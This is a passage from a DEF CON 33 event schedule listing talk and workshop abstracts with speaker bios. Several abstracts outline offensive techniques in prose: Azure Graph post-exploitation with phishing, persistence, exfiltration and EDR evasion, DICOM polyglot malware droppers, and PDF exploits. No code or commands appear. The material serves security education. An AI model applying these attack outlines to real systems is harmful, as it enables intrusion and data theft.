Pipeline without the check -> potential security failure.
Integrate OSS security tool into the pipeline.
Trigger pipeline again -> security issue found.
Fix the issue.
Re-run pipeline -> successful pass.
For time reasons, we will focus specially in Pipeline Security, Infra as Code scan, Container Scan and Secrets Detection steps.
Conclusion & Q&A
Cloud Security Engineer at Prowler.
I began my career as a Sysadmin, evolved to Site Reliability Engineer, and a few years ago crossed over to the dark side... Security. A long-time CTF enthusiast and hooked on anything with a scoreboard.
Currently, I'm starting unicrons.cloud project aiming to share cloud security knowledge and resources with the community.
SpeakerBio: Paco Sanchez LopezI’m an SRE focused on Developer Productivity and Platform Engineering, with over 8 years of experience building tools that help developers work smarter. I pride myself on being highly pragmatic, always prioritizing solutions that balance efficiency and impact. Oh, and fun fact: my right thumb is actually my toe. Yes, it’s as weird as it sounds, but I like to think I can give "Super Likes".
- ics Calendar file
Lex Sleuther is an internal tool developed at CrowdStrike for detecting the script language of an unknown text file based purely on its contents. We derive a novel approach using lexer generators and ridge regression and develop the solution as a compact Rust binary with Python bindings. We compare our solution to the current state of the art and present CrowdStrike’s own findings of relative efficacy in the field. Lex Sleuther has been recently open sourced for everybody to use.
SpeakerBio: Aaron "KNOX" JamesAaron has been the tooling guy for over 13 years, when he first wrote hacks for his favorite games. He still writes hacking tools, but now for security companies.
- ics Calendar file
The LHC Capture The Flag is a beginner-friendly, jeopardy-style competition designed to introduce newcomers to the exciting world of cybersecurity challenges. Participants will explore a diverse range of categories including steganography, radio communications, encryption techniques, and mind-bending puzzles, all structured to build fundamental hacking skills. This hands-on component provides a supportive environment for learning, with some challenges uniquely incorporating physical items that can be accessed in the LHC Community Room. Whether you're curious about cybersecurity or looking to develop your technical problem-solving abilities, this CTF offers an accessible entry point into the fascinating realm of hacking.
- ics Calendar file
Give a talk about whatever you want, as long as it's less than 10 minutes! Or just come and chill in the Nix Vegas space for the Unconference.
- ics Calendar file
Linecon is your optional opportunity to stand (or sit) in line for human registration to open. Doors will open for linecon on Wednesday at approximately 17:00. When human registration opens on Thursday at approximately 08:00, they start working the linecon queue, and the line will start moving quickly. (Please understand that we will begin processing the line on Thursday morning as soon as the cashiers and materials are in place; we will strive for Thursday 08:00, but actual start may be slightly earlier or later.)
Online badge purchase (aka pre-registration) has no impact on linecon. You can join the line on Wednesday (if you wish) regardless of whether you purchased a badge online or intend to pay with cash. There is only one linecon for both types of badge sales.
Please help us make this a great experience for everyone by following directions given by goons. After human registration opens, there may be one line for all of registration, or there may be two lines (one for online sales (pre-registration) and one for cash sales). This may also change over time, based on available staffing and necessary crowd control. We will strive to make it easily understandable in-person as to which line you should join.
Please also review the "Human Registration Open" event, and familiarize yourself with the important notes therein.
- ics Calendar file
Knowing how to use the Linux command line is a critical skill for any good security practitioner. This trainer will have 10+ problems covering some of the most fundamental Linux commands. This trainer is for people new to field and for those who want to hone their Linux command line-fu.
- ics Calendar file
- ics Calendar file
- ics Calendar file
- ics Calendar file
As orgs lean harder on Entra and Azure for critical IdP and infra, attackers are shifting too. This talk introduces a PowerShell-based post-exploitation toolkit that uses only native Windows features and the Microsoft Graph API — no external modules, agents, or DLLs required. Designed to “live off the Graph,” it enables stealthy recon, escalation, persistence, and exfil using just REST calls and default PowerShell, evading top EDRs with ease (as of April 2025, at least).
We’ll walk through real-world kill chains using Microsoft’s own APIs, abusing OAuth flows, consent, and service principal escalation to move laterally, assign roles, drop loot, and stay hidden. Attendees will learn how attackers can inject secrets into app registrations, enumerate high-privilege service principals, assign Entra + Azure roles via Graph/ARM, and exfiltrate via tenant-native blob storage - all without touching the Azure portal or importing a single module.
No implants. No imports. No sketchy domains. Just what’s already there.
To ground the talk, I’ll give a short crash course on Azure OAuth, app types, API endpoints, and how attackers bypass common controls like MFA, CAP, and Token Policies.
A full lab demo will show how access is gained via spear-phishing, followed by escalation and persistence using only built-in PowerShell. Blue teamers will walk away with concrete detection ideas. Red teamers will leave with a framework—or inspiration to build their own.
Toolkit Breakdown
Requirements: - PowerShell execution - Internet access to Azure APIs - A juicy Azure target
Auth: - Spear-phish via Microsoft’s Device Code Auth (popularized by Russian APTs this year) - Store tokens in a native JSON-based keyring - Tag tokens by role for scope tracking
Recon: - Enumerate Service Principals + Graph scopes (regex filtering) - Enumerate ARM role assignments (regex filtering) - Enumerate Key Vaults - Identify attack paths from collected data
Persistence: - Create malicious apps - Inject secrets into any apps - Add remediation tasks - Spawn containers/functions
Escalation: - Use keyring + recon to select injection targets - Pivot via apps to bypass CAP/MFA/token policies - Dump Key Vaults - Rotate identities mid-chain - Assign permissions to any app
Exfil: - Recon modules write loot as .csv - Create public Azure blob storage - Upload loot directly
Stealth: - No compiled code—just .ps1, .json, .csv - Built-in PowerShell + REST only - Avoids PowerShell and module-based detections - No alerts from CrowdStrike, Defender, or SEP in testing
Automation: - Spear-phish module auto-generates lures and captures tokens - One-shot persistence module sets up a cron-style enumerate+dump pipeline in cloud containers - One-shot exfil module creates resources, publishes open loot container - Operator just selects targets/IDs
This tool is actively developed by me. Nobody’s seen it in action yet—except my girlfriend and my cats. Been saving it for DEFCON :)
SpeakerBio: TrevorI'm a lifelong hacker and technology enjoyer, with a passion for automation and expanding my knowledge of new systems. I got started with "security" as a preteen, hacking with BackTrack and taking advantage of the relatively insecure implementations that were pervasive in the early 2000s. After finishing school, I started working in IT and eventually moved into cybersecurity professionally.
Fast forward to 2025: I'm currently a Lead Security Engineer at Wells Fargo, focusing on adversary emulation and offensive security research. In this role, I create PoCs and tools to exploit the latest vulns and bypass EDR, and I train junior engineers and analysts on complex techniques and topics. The tooling and training I provide typically illustrate full kill chains, empowering them to hunt and respond with speed and precision.
Prior to my current role, I worked as a Senior Cloud Security Engineer at Wells Fargo, focusing heavily on blue team–oriented Azure operations. Much of the inspiration for this tool and demo comes from the experience I gained working in the Bank's highly restricted, federally regulated environment. Before Wells Fargo, I was at Sony (PlayStation—the cool one :P) as an L3 Sysadmin, and at Kudelski Security (an MSSP) as a Security Engineer supporting dozens of massive clients around the globe. Thanks to that prior experience, I’ve had the privilege of being exposed to a wide variety of environments and tooling, which I'm grateful for.
Outside of work, I'm either studying (GXPN currently) or in the lab developing my own projects, researching, building, breaking, etc.
Unrelated, but I’ve also been DJing at DEFCON for the last few years, so I’m especially hyped to level up my participation and submit a talk/demo for my favorite village. DEFCON pushed me further down this path early on, and I’m ready to give back. Besides computers, I’m also very into fast cars and massive sound systems.
When it comes to offensive ops: living off the land is the motto, exploitation is the mission, automation is the lifestyle.
- ics Calendar file
The biggest speed picking event in North America debuts at DEFCON 33 this year! Join us to see the top competitors from Friday and Saturday's qualifying brackets hash it out and be crowned champion of TOOOL's Locktopus Speed Picking Challenge!
SpeakerBio: Hipu
- ics Calendar file
Loong Community is Landing at DEFCON 33! Co-Hosted by Hong Kong & Singapore Crew!
Get ready to explore the cutting edge of hardware hacking & infosec tools at Loong Village in #DEFCON33!
This year, Loong is a powerhouse HK-SG collaboration focused on showcasing the vibrancy and talent of the Asian infosec community with tools all arouund the world! 🇸🇬🤝🇭🇰
Dive into hands-on mini-stations featuring: - 📡 SDR Playground (Signalens Pro, Kraken SDR, HackRF, RTL SDR. RF Explorer H Loop Antenna etc.) - ⌨️ BadUSB (Hak5 Rubber Ducky, USB Ninja, O.MG Cables) - 🔑 RFID/NFC Exploration (Proxmark3 RDV4.01, Flipper Zero, Signalens Pro) - 🌐 Network Pentest Tools (Wifi Pineapple, Cynthia, DualComm Network Tap, ScreenCrab) - 🎫 Exclusive Off-by-One (Singapore) Badges (available for purchase!) - Drone FPV simulator, VR/MR, Neo
- ics Calendar file
If you find something that seems to have been lost, please take that item to the nearest NFO Node. The item will enter the DEF CON Lost & Found system.
If you've lost something, the only way to check on it (or reclaim it) is by going to the Lost & Found department yourself. The Lost & Found department is in room LVCC - L2 - W238. You may also call Lost & Found at +1 (702) 477-5019.
The Lost & Found department plans to be open Thursday - Saturday, during all hours that the conference operates. On Sunday, the Lost & Found department will open with the venue at 08:00, but will close at the beginning of DEF CON 33 Closing Ceremonies (15:00). Shortly thereafter, all remaining lost items will be transferred to the LVCC. If you need to reach LVCC's Lost & Found, you may call LVCC Dispatch at +1 (702) 892-7400.
- ics Calendar file
As Macs continue to gain popularity, the volume and sophistication of malware targeting Apple’s desktop platform is also on the rise. This hands-on introductory workshop is designed for anyone curious about how macOS malware works and how to effectively analyze it. Led by Mac security expert and author Patrick Wardle, the session covers the fundamentals of macOS malware analysis. You’ll examine real-world threats to understand how they function under the hood and learn to use simple yet powerful tools to dissect these malicious programs.
No prior experience with macOS malware is required. Whether you're a student, a security enthusiast, or just getting started in the field, this workshop will provide a solid foundation and the practical skills needed to begin analyzing threats and thinking like a Mac defender.
SpeakerBio: Patrick WardlePatrick Wardle is the founder of the Objective-See Foundation, the CEO/Cofounder of DoubleYou, and the author of "The Art of Mac Malware" book series. Having worked at NASA and the NSA, as well as presenting at countless security conferences, he is intimately familiar with aliens, spies, and talking nerdy. Passionate about macOS security, Patrick spends his days discovering Apple 0days, studying macOS malware, and releasing free open-source security tools to protect Mac users.
- ics Calendar file
In his final boss form "Houdinti", @intidc delivers an interactive magic show in which every trick is an actual live hack. During this spectacle, we're hacking several locks, biometrics, passwords, PIN codes & more! The show is suited for both beginners and pro's, who'll get the opportunity to take a guess on how the tricks work prior to them being revealed. Live hacking demonstrations will never be the same again.
SpeakerBio: Inti "intidc" De Ceukelaire, Chief Hacker Officer at IntigritiInti De Ceukelaire is a Belgian ethical hacker and cybercrime investigator. He currently works as the Chief Hacker Officer at Europe's largest vulnerability disclosure platform Intigriti, a founding member of the Hacker Policy Council. In 2018, Inti won the "Most Valuable Hacker" award at the largest live hacking event in Las Vegas.
With extensive experience in the field of security and ethical hacking, Inti has earned a reputation as a thought leader in the industry. His work and expertise have been featured in a variety of international publications, including the BBC, Wired, The Verge, CNET, Mashable, and New York Magazine. Inti has made global headlines through his security awareness pranks, which have included manipulating the Vatican's website, creating fake news on Donald Trump's Twitter account, and hacking Metallica. Through these high-profile stunts, Inti has drawn attention to the importance of cybersecurity and the need for individuals and organisations to be vigilant about potential threats. As an experienced and engaging speaker, Inti is able to make complex topics accessible to a wide audience. He has spoken at a variety of conferences and events, sharing insights on the latest trends in cybersecurity and offering practical tips to help individuals and organisations protect themselves from potential threats.
He is also a trusted source for media outlets seeking expert commentary on topics related to cybersecurity, hacking and technology.
- ics Calendar file
Kit cost $80
- ics Calendar file
The DICOM image format, used globally in healthcare to store and transmit medical images, contains a rarely discussed flaw in its header structure that can be exploited to hide malicious payloads. In this talk, we explore how attackers can embed code into DICOM files that still open and display normally in medical imaging software. You’ll learn how this permissive header allows for the creation of polyglot files—valid DICOM images that double as malware droppers. Because most static antivirus engines treat DICOM files as benign or ignore them altogether, these hybrid files can often bypass traditional detection mechanisms entirely. We’ll demonstrate how this works in practice, walking through the process of crafting DICOM-based payloads and showing how they behave on a target system. Attendees will also gain insight into why these files evade static scans and what this means for healthcare security at large.This talk is aimed at both red teamers and defenders. Offensive security professionals will gain a novel method for payload delivery in highly regulated environments, while defenders will leave with practical strategies for detecting and mitigating this class of threat. This presentation highlights how blind trust in industry-standard formats can create dangerous blind spots in security. The DICOM format’s flexibility—originally designed for compatibility—now serves as a potential attack vector, and it’s time the infosec community pays attention.
SpeakerBio: Michael "v3ga" Aguilar, Principal Consultant at Sophos Red TeamMichael Aguilar (v3ga) is a Principal Consultant for Sophos Red Team. He leads efforts in Medical Device testing, Adversarial Simulations, Physical Security assessments, Network testing and more. Currently, he has 8 CVE vulnerabilities aligned with security issues located during testing at DEF CON's Biohacking Village Device Lab. He has also led the winning team of the DEF CON Biohacking Village CTF for two consecutive years.
- ics Calendar file
- ics Calendar file
Limitations can result in creative solutions. For most hackers I know, this is core to why we do what we do. Being an artist has taught me to do the challenging and ridiculous at all costs. Most of the time, these values align, but sometimes they result in fabulous disasters. As of this writing, this is not the latter.
This talk is a reflection on badge creation, challenges, the badge curse, and the blurred lines between art and hacking. It examines how we perceive and value creation and making, inside and outside of our own circles.
SpeakerBio: MarMar has spent over 15 years contributing to DEF CON, ranging from illustration, badges & interactive experiences to art direction. Last year they designed & directed the creation of the DEF CON 32 Raspberry Pi badge, on which attendees played a custom game of the convention itself in real-time.
Mar has helped found, and has chaired hackerspaces and an art collective. They've painted public murals in the US and abroad, and held a residency at the Denver Art Museum, which explored the relationships between people and their identities online.
This year they open "Feral Gallery" in Denver, focused on queer and indigenous works. You can find Mar (and support their art!) at the Arts & Entertainment booth at con.
- ics Calendar file
Ready to multiclass from D&D player to educational game master?
This hands-on train-the-trainer workshop teaches experienced tabletop gamers the specialized skills needed to facilitate epic learning sessions using the Malware & Monsters framework.
Through guided gameplay with pre-built characters and comprehensive facilitator guides, you'll master advanced IM techniques for educational environments—from managing player dynamics to controlling session flow and handling those inevitable "but what if I cast fireball?" moments in a learning context.
No cybersecurity teaching experience required; we're focusing purely on leveling up your facilitation skills.
Earn your “official” Incident Master license and walk away with a complete facilitator toolkit, proven techniques, and the confidence to run engaging educational gaming sessions that would make even the most veteran DM proud.
Speakers:Klaus Agnoletti,Glen SorensenGlen Sorensen is a Virtual Chief Information Security Officer (vCISO) and Managing Director with Cyber Risk Opportunities. He has worn numerous hats in his career, in areas such as security engineering and architecture, security operations, GRC, and leadership. He has held a variety of roles as an analyst, engineer, consultant, auditor, regulator, and information security officer for a financial institution.
Glen approaches problems with practical solutions that bring good business value and has worked across many sectors, including financial services, healthcare, manufacturing, and others. He has served as a consulting expert in a large legal case involving healthcare and cyber attack detection technology. He has been in IT and security for 15+ years, longer if you count years of misspent youth bending technology and countless hours of roleplaying games. He is a sucker for a good tabletop exercise and serves as an Incident Master for HackBack Gaming, the fun kind of TTX.
- ics Calendar file
This Workshop delves deep into the intricate structures of PDF files, offering a meticulous analysis of each segment. Unveiling the covert strategies of threat actors, we explore how they ingeniously incorporate malicious components into file structures. The session elucidates the meticulous collection of IOCs (Indicators of Compromise) and the construction of IOAs (Indicators of Attack) for behavioral analysis, empowering defenders to anticipate and thwart novel attack vectors. Our technical journey navigates through the PDF file's anatomy, encompassing headers, bodies, cross-reference tables, and trailers. Live demonstrations dissect malicious PDFs using tools like pdfid, pdf-parser, and pdftk, providing hands-on insights into the analysis process. The presentation unravels encoding techniques and exposes threat actors' methodologies in establishing Command and Control (C&C) channels within PDF files. The session concludes with an opportunity for questions, equipping participants with advanced knowledge for robust malware analysis and proactive defense strategies.
SpeakerBio: Filipi Pires, Head of Identity Threat Labs and Global Product Advocate at SeguraI’ve been working as Head of Identity Threat Labs and Global Product Advocate at Segura®, Red Team Village Director, Senior Advisor Raices Cyber Academy, Founder of Red Team Community (Brazil and LATAM), AWS Community Builder, Snyk Ambassador, Application Security Specialist and Hacking is NOT a crime Advocate. International Speaker at Security and New technologies events in many countries such as US (Black Hat & Defcon), Canada, France, Spain, Germany, Poland, Black Hat MEA - Middle-East - and others, I’ve served as University Professor in Graduation and MBA courses at Brazilian colleges, in addition, I'm Creator and Instructor of the Course - Malware Attack Types with Kill Chain Methodology (PentestMagazine), PowerShell and Windows for Red Teamers(PentestMagazine) and Malware Analysis - Fundamentals (HackerSec).
- ics Calendar file
Join us for an in-depth exploration of how PDFs, a ubiquitous document format, can be exploited as a vessel for executing malicious JavaScript malware. This presentation will delve into real-world vulnerability that have been targeted to execute harmful code within PDF files—posing a serious threat in today's cybersecurity landscape.
Key exploit techniques we'll explore include:
Heap Spray Attacks: Using shellcode to strategically overwrite memory, thereby enabling attackers to execute arbitrary code and gain control over target systems.
Data Exfiltration Tactics: Methods for covertly extracting critical information, such as email addresses and system details, from users without their knowledge or consent. Embedding Malware in PDFs: An examination of how attackers embed harmful scripts into PDFs, tricking users into activating exploits within Adobe Reader through seemingly ordinary actions.
We'll dissect malicious actions such as shellcode injection, buffer overflow attacks, Adobe Reader exploit, and memory manipulation, all designed to execute malware effectively.
This session is perfect for offensive security professionals seeking to deepen their understanding of PDF-based exploits and enhance their penetration testing and threat emulation capabilities. Discover how these sophisticated threats operate and learn strategies to counteract them within your security frameworks. Join us to stay ahead in the ever-evolving world of cyber threats.
More information about the presentation you can find in this article - https://labs.senhasegura.blog/unmasking-the-threat-a-deep-dive-into-the-pdf-malicious-2/
SpeakerBio: Filipi Pires, Head of Identity Threat Labs and Global Product Advocate at SeguraI’ve been working as Head of Identity Threat Labs and Global Product Advocate at Segura®, Red Team Village Director, Senior Advisor Raices Cyber Academy, Founder of Red Team Community (Brazil and LATAM), AWS Community Builder, Snyk Ambassador, Application Security Specialist and Hacking is NOT a crime Advocate. International Speaker at Security and New technologies events in many countries such as US (Black Hat & Defcon), Canada, France, Spain, Germany, Poland, Black Hat MEA - Middle-East - and others, I’ve served as University Professor in Graduation and MBA courses at Brazilian colleges, in addition, I'm Creator and Instructor of the Course - Malware Attack Types with Kill Chain Methodology (PentestMagazine), PowerShell and Windows for Red Teamers(PentestMagazine) and Malware Analysis - Fundamentals (HackerSec).
- ics Calendar file
npm is owned by Microsoft and is the world’s largest software registry. It hosts nearly 5 million packages and 4.5 trillion requests for packages were made to npm in 2024. The open and accessible nature of npm is one of its main features, but its also one of the reasons that threat actors are attracted to it. A recent study by Sonatype found that 98.5% of malicious software packages are hosted and delivered via npm.
This technical deep-dive will explain why npm is so good at delivering malware; expose how threat actors are using npm; and why existing security tools like SCA, SAST, EDR and anti-virus solutions will not protect you from npm based malware.
Key Topics:
Paul is the Head of Research at Safety (safetycli.com) and a DevSecOps OG. He loves software supply chain research and delivering supply chain offensive security training and engagements. He's spent the last two years deep-diving into npm and has made several discoveries about the ecosystem. Paul founded multiple startups starting in the '90s, with UtahConnect, SecureStack in 2017, and SourceCodeRED in 2023. Paul has worked for NASA, Boeing, Blue Cross/Blue Shield, John Deere, the US military, the Australian government and several startups over the last 30 years. Paul is a frequent open-source contributor and author of several DevSecOps, software supply chain and threat modelling projects. He’s currently writing a book entitled “Hacking NPM”, and when he’s not doing that, he’s snowboarding with his wife and 3 amazing kids.
- ics Calendar file
In this talk, the speaker details how a threat actor’s OPSEC slip—testing their own keylogger and infostealer on their hacking machine—provided a real-time view into a cybercrime operation. By intercepting Telegram-based command-and-control (C2) communications, the speaker obtained hundreds of screenshots and keylogs of the threat actors desktop, revealing the entire cybercrime operation. The session also covers the creation of Telegram bot tokens, which were then embedded in malware to enable covert data exfiltration and remote control.
Through automated analysis techniques, including VirusTotal and custom YARA rules, the speaker tracked samples communicating with Telegram’s API, extracted thousands of bot tokens that were used to forward stolen data, used these to intercept communications, and mapped backend infrastructure through screenshots of the threat actors desktop. This process led to the discovery of links to broader phishing and malware campaigns, underscoring how trusted platforms like Telegram can be abused by malicious actors.
References:
SpeakerBio: Ben "polygonben" FollandBen Folland is a Security Operations Analyst at Huntress, where he manages hands-on-keyboard intrusions and dismantles active threats daily. Before that, he worked at one of Accenture’s SOCs, defending UK Critical National Infrastructure, gaining deep experience in high-stakes environments. He's all about DFIR, malware analysis, and threat hunting—and has a knack for exposing adversary tradecraft. Ben's spoken at over 10 conferences (including six BSides), taught SOC workshops at universities, is GIAC GCFA certified, and was a finalist for the UKs national cyber team. Whether it's CTFs or live incidents, Ben thrives on the chase and brings a hacker mindset to everything he does.
- ics Calendar file
Since 2007, Russia has increasingly blurred the lines between cyber operations and conventional warfare. From the takedown of Estonian infrastructure to the full-scale invasion of Ukraine, state-sponsored threat groups have played a central role in shaping modern conflict. This talk explores the evolution of Russian hybrid warfare through an OSINT lens - identifying cyber-military units, understanding their affiliations, and tracking their operations across conflicts.x000D Using publicly available sources, leaked documents, social media, and infrastructure metadata, this session walks through the investigative workflows used to map Russian cyber-military entities, analyze their digital footprint, and connect the dots between cybercrime and geopolitical objectives. We'll also examine how the war in Ukraine has reshaped the cybercrime ecosystem and offer predictions about future state-actor behavior in conflict zones.x000D This talk blends technical OSINT techniques with geopolitical analysis, providing practical frameworks and tools for analysts, threat hunters, and researchers focused on adversary attribution and long-term strategic tracking.x000D Key Topics Covered:x000D • Evolution of Russian hybrid warfare: Estonia (2007) to Ukraine (2022–2025)x000D • OSINT methods to identify Russian cyber-military units and affiliations_x000D_ • Social media and metadata exploitation of military and GRU-linked personnel_x000D_ • Infrastructure recon: domains, TLS certificates, passive DNS, and comms patterns_x000D_ • War’s impact on the cybercrime underground and ransomware ecosystem_x000D_ • Predictive indicators for future state-linked cyber operations
SpeakerBio: Evgueni ErchovSince 2007, Russia has increasingly blurred the lines between cyber operations and conventional warfare. From the takedown of Estonian infrastructure to the full-scale invasion of Ukraine, state-sponsored threat groups have played a central role in shaping modern conflict. This talk explores the evolution of Russian hybrid warfare through an OSINT lens - identifying cyber-military units, understanding their affiliations, and tracking their operations across conflicts.x000D Using publicly available sources, leaked documents, social media, and infrastructure metadata, this session walks through the investigative workflows used to map Russian cyber-military entities, analyze their digital footprint, and connect the dots between cybercrime and geopolitical objectives. We'll also examine how the war in Ukraine has reshaped the cybercrime ecosystem and offer predictions about future state-actor behavior in conflict zones.x000D This talk blends technical OSINT techniques with geopolitical analysis, providing practical frameworks and tools for analysts, threat hunters, and researchers focused on adversary attribution and long-term strategic tracking.x000D Key Topics Covered:x000D • Evolution of Russian hybrid warfare: Estonia (2007) to Ukraine (2022–2025)x000D • OSINT methods to identify Russian cyber-military units and affiliations_x000D_ • Social media and metadata exploitation of military and GRU-linked personnel_x000D_ • Infrastructure recon: domains, TLS certificates, passive DNS, and comms patterns_x000D_ • War’s impact on the cybercrime underground and ransomware ecosystem_x000D_ • Predictive indicators for future state-linked cyber operations_x000D_
- ics Calendar file
- ics Calendar file
In this audience participation-heavy session, you can get your PRs to nixpkgs reviewed and maybe even merged... if the build on one of our Threadripper Pro or Ampere systems passes.
Come with PRs in hand and call them out, and we'll review, build, and maybe even merge them on stage.
Rejected name: Whose PR Is It Anyway
- ics Calendar file
In this talk we'll explore the capabilities of several of the new 802.11AH radios/chipsets that have come onto the market and examine what is needed to develop an ultra low cost/power minimum viable point-to-point wifi repeater using 802.11AH as the backhaul connection. We'll consider and review the constraints of the various AH modules and their associated software libraries, as well as hardware and software considerations for the 802.11a/b/n wifi side as well. We'll review my initial stumblings and failed attempts and then examine some COTS hardware. We'll review both COTS modules as well as a purpose built finished product that largely does what we're trying to replicate -- we'll reverse engineer their schematics and firmware and ultimately design our own purpose-built custom battery/solar powered PCB and firmware running OpenWRT and supporting 900Mhz, 2.4Ghz, and 5Ghz wifi. We'll then cover deployment and operational characteristics/performance of pairs of these devices when connected to the internet via the free corporate wifi provided at retail and dining establishments.
SpeakerBio: LozaningLozaning (they/them) is present on various spectrums and resonate at multiple frequencies. They're particularly interested in the security of embedded rf systems, and especially particularly interested in the Espressif line of of wireless capable microcontrollers. They previously created and talked about the International Wigle Space Balloon, RF Field Cams, Toothbrush botnets, and The Wifydra. They're currently ranked as the 55th best wardriver in the world, and to the best of their knowledge dont presently have any federal warrants out for their arrest.
- ics Calendar file
Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive DEF CON Human Badge with their registration
The topic of the course is offensive security testing of medical devices and the impact this has on the future of medical device production. The course is a seasoned entry/mid level to advanced course. The students will be learning all that the trainers know about Medical Device hacking and the things they have learned in their interactions as testers with these devices. This is inclusive of skills such as:
- ics Calendar file
Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive DEF CON Human Badge with their registration
The topic of the course is offensive security testing of medical devices and the impact this has on the future of medical device production. The course is a seasoned entry/mid level to advanced course. The students will be learning all that the trainers know about Medical Device hacking and the things they have learned in their interactions as testers with these devices. This is inclusive of skills such as:
- ics Calendar file
Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive DEF CON Human Badge with their registration
The topic of the course is offensive security testing of medical devices and the impact this has on the future of medical device production. The course is a seasoned entry/mid level to advanced course. The students will be learning all that the trainers know about Medical Device hacking and the things they have learned in their interactions as testers with these devices. This is inclusive of skills such as:
- ics Calendar file
Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive DEF CON Human Badge with their registration
The topic of the course is offensive security testing of medical devices and the impact this has on the future of medical device production. The course is a seasoned entry/mid level to advanced course. The students will be learning all that the trainers know about Medical Device hacking and the things they have learned in their interactions as testers with these devices. This is inclusive of skills such as:
- ics Calendar file
The DEF CON Memorial Chamber serves as a sacred space within our community — a place where we pause to honor those hackers whose brilliance and dedication have elevated not just our craft, but the entire security ecosystem. Here we remember figures whose generous spirit and willingness to coordinate security fixes demonstrated that true hacking greatness lies in collaboration. We are here because DEF CON has been the beating heart of the hacker community for over three decades, growing from 100 people in 1993 to the world's largest hacker conference. As Jeff Moss envisioned, DEF CON is what we make of it, this memorial space represents our commitment to ensuring that the legacy of those we've lost continues to inspire future generations of hackers to pursue knowledge, build community, and use their gifts to make the world better.
- ics Calendar file
This talk explores how modern applications running in serverless (e.g., AWS Lambda, Azure Functions) and containerized (e.g., Docker, Kubernetes) environments expose secrets, credentials, and runtime data through memory-based attack techniques. We’ll showcase how attackers exploit poor memory hygiene, insecure environment variable handling, and intra-container leaks to gain access to sensitive data — even when traditional endpoint protection and file-based forensics are rendered useless.
Speakers:Om Narayan,RashmiExperienced cybersecurity professional with a proven track record in securing critical cloud services, including DynamoDB, Keyspaces, Finspace, Amazon Managed Bitcoin, and Amazon Managed Airflow. Skilled in implementing robust security measures for GenAI capabilities within these platforms, serving a diverse range of industries such as healthcare, government, finance, entertainment, education, and fitness. Committed to protecting data integrity and ensuring compliance for global customers
SpeakerBio: RashmiRashmi is a cybersecurity engineer focused in application security. Alongside her expertise in safeguarding applications from cyber threats, she leverages her solid background in software development to build secure and resilient solutions. Rashmi has worked in organizations such as AWS and Electronic Arts, where she honed her skills and contributed to the security of critical applications. Outside of work, Rashmi enjoys exploring comedy clubs, playing badminton, and reading books, combining a love for both mental and physical activities.
- ics Calendar file
All merch sales are USD CASH ONLY. No cards will be accepted.
The published hours for the merch area are only an approximation: supplies are limited, and when merch is sold out, the merch area will close for the year. (We intend to update this schedule to reflect their true operating status, but this is strictly best-effort.)
Note that the closing hours here are when sales must have ended. For example, if sales must end by 18:00, and we estimate that it will take 2 hours to clear the queue, doors are likely to close around 16:00. Because of this dynamic nature, we can't predict the length of the line or when doors will be closed.
- ics Calendar file
Kit cost $135
- ics Calendar file
Meshtastic has exploded in popularity as the go-to off-grid, multi-mile, low-power LoRa mesh for hikers, hackers, and preppers, though most users never peek beneath its phone app. This talk rips the protocol open from the radio chirp visible in inspectrum all the way to lines in Wireshark, showing exactly how every byte travels from a solar-powered node on a mountaintop to your screen.
Using an SDR, a GNU Radio flowgraph, and a sprinkle of Python, we peel back each layer: how the radio forms its chirps, how the mesh hops frames across nodes, and what exactly is tucked inside the Protobuf envelope and its AES-256-sealed core.
The exploration does not end with passive listening. Short, standalone snippets demonstrate how to craft and transmit valid frames, proving that a few lines of code are enough to speak Meshtastic. No mobile app or heavyweight firmware required.
Attendees will leave with a repeatable SDR and GNU Radio workflow for decoding any Meshtastic channel, copy-ready Python examples for both receiving and sending traffic, and a clear mental model of the entire stack from physical layer to application payloads. Whether you are RF-curious with a forty-dollar RTL-SDR dongle or a seasoned signals wrangler hunting for a new playground, this talk equips you to see and speak the language of Meshtastic.
SpeakerBio: Allan Riordan BollAllan wrangles cloud infrastructure by day, and radio waves by night. An early SDR devotee from the sub-$20 RTL-SDR era, he can often be found between a hex editor and an FFT waterfall, tinkering with the invisible.
- ics Calendar file
Proxies, along with local, reverse, and dynamic forwards, enable red teams to maintain persistent access and move laterally within target environments. By combining these techniques, operators can construct sophisticated attack chains that enable deep network access through multiple segmented environments. This presentation will dive into the setup, usage, and attacker techniques required to be effective with proxies. To demonstrate these techniques, the presenters will use a publicly available tunneling toolkit, Messenger.
Speakers:Skyler Knecht,Kevin ClarkSkyler is a Senior Security consultant at SpecterOps, where he performs security assessments for Fortune 500 organizations. With over six years of experience, he focuses on initial access research and contributes to the security community through open-source development and conference presentations. Skyler has presented at DEF CON and BSides and actively collaborates on open-source projects such as Messenger, Ek47, Connect, and Metasploit. He also conducts vulnerability research, having discovered multiple zero-day vulnerabilities in enterprise software.
SpeakerBio: Kevin Clark, Red Team Instructor at BC SecurityKevin Clark is a Security Consultant with TrustedSec and a Red Team Instructor with BC Security, with a diverse background in software development, penetration testing, and offensive security operations. Kevin specializes in initial access techniques and Active Directory exploitation. He has contributed to open-source projects such as PowerShell Empire and developed custom security toolkits, including Badrats and Ek47. A skilled trainer and speaker, Kevin has delivered talks and conducted training sessions all over the country at cybersecurity conferences, including Black Hat and DEF CON, and authors a cybersecurity blog at https://henpeebin.com/kevin/blog.
- ics Calendar file
Bare metal cloud providers are rapidly gaining popularity among organizations deploying high-performance machine learning workloads. While the promise of dedicated hardware and enhanced security may appear attractive, a closer look revealed that these environments are vulnerable to decades-old attacks that are sure to trigger nostalgia.
This talk investigates the hidden risks posed by the "bare metal" trend, illustrating how weaknesses in firmware, hardware, and the network can lead to catastrophic multi-tenant compromise. We'll walk through real-world case examples demonstrating how attackers can leverage these vulnerabilities including hijacking provisioning processes, installing persistent firmware implants, intercepting sensitive network data, and compromising secure machine learning workflows.
Attendees will gain insight into the unique attack surfaces of bare metal environments, understand why seemingly outdated techniques remain highly effective, and learn how major cloud providers mitigate these threats. Expect technical demonstrations, practical advice on evaluating providers, and recommendations for protecting your organization's critical infrastructure.
References:
SpeakerBio: Bill DemirkapiBill is a security researcher with a passion for finding bugs at scale. His interests include reverse engineering and vulnerability research, ranging from low-level memory corruption to systemic flaws with catastrophic consequences. He started his journey in high school and has since published his work at internationally-recognized conferences like DEF CON and Black Hat USA. In his pursuit to make the world a better place, Bill constantly looks for the next significant vulnerability, following the motto "break anything and everything".
- ics Calendar file
